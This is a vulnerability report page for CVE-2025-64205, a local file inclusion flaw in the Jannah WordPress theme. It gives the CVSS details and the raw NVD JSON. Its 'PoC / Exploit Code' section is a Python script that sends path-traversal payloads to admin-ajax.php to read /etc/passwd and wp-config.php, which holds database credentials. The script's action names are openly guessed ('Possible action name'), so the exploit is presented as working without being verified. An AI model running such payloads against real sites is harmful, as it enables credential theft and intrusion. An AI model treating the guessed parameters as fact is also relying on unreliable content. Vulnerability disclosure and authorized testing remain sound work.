Security Vulnerability Report
中文
CVE-2025-64205 CVSS 8.1 HIGH

CVE-2025-64205

Published: 2025-12-18 08:16:11
Last Modified: 2026-04-27 16:16:35

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in TieLabs Jannah jannah allows PHP Local File Inclusion.This issue affects Jannah: from n/a through <= 7.6.0.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

TieLabs Jannah WordPress主题 <= 7.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-64205 PoC - Jannah Theme Local File Inclusion # Target: WordPress site using Jannah theme <= 7.6.0 target_url = "http://target-site.com/wp-admin/admin-ajax.php" # LFI payloads to read sensitive files payloads = [ "../../../../etc/passwd", "../../../../wp-config.php", "../../../../../../../etc/passwd", ] def test_lfi(target, payloads): """Test for LFI vulnerability in Jannah theme""" for payload in payloads: params = { 'action': 'jannah_get_template', # Possible action name 'template': payload } try: response = requests.get(target, params=params, timeout=10) if 'root:' in response.text or '<?php' in response.text: print(f"[+] Potential LFI found with payload: {payload}") print(f"[+] Response preview: {response.text[:500]}") return True except requests.RequestException as e: print(f"[-] Error testing {payload}: {e}") return False # Alternative POST-based attack def test_lfi_post(target, payloads): """Test LFI via POST request""" for payload in payloads: data = { 'action': 'jannah_ajax_handler', 'file': payload } try: response = requests.post(target, data=data, timeout=10) if response.status_code == 200: print(f"[*] Testing POST payload: {payload}") except requests.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": print("CVE-2025-64205 PoC - Jannah Theme LFI") print("Use responsibly and only on authorized systems")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64205", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:10.883", "lastModified": "2026-04-27T16:16:34.870", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in TieLabs Jannah jannah allows PHP Local File Inclusion.This issue affects Jannah: from n/a through <= 7.6.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/jannah/vulnerability/wordpress-jannah-theme-7-6-0-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}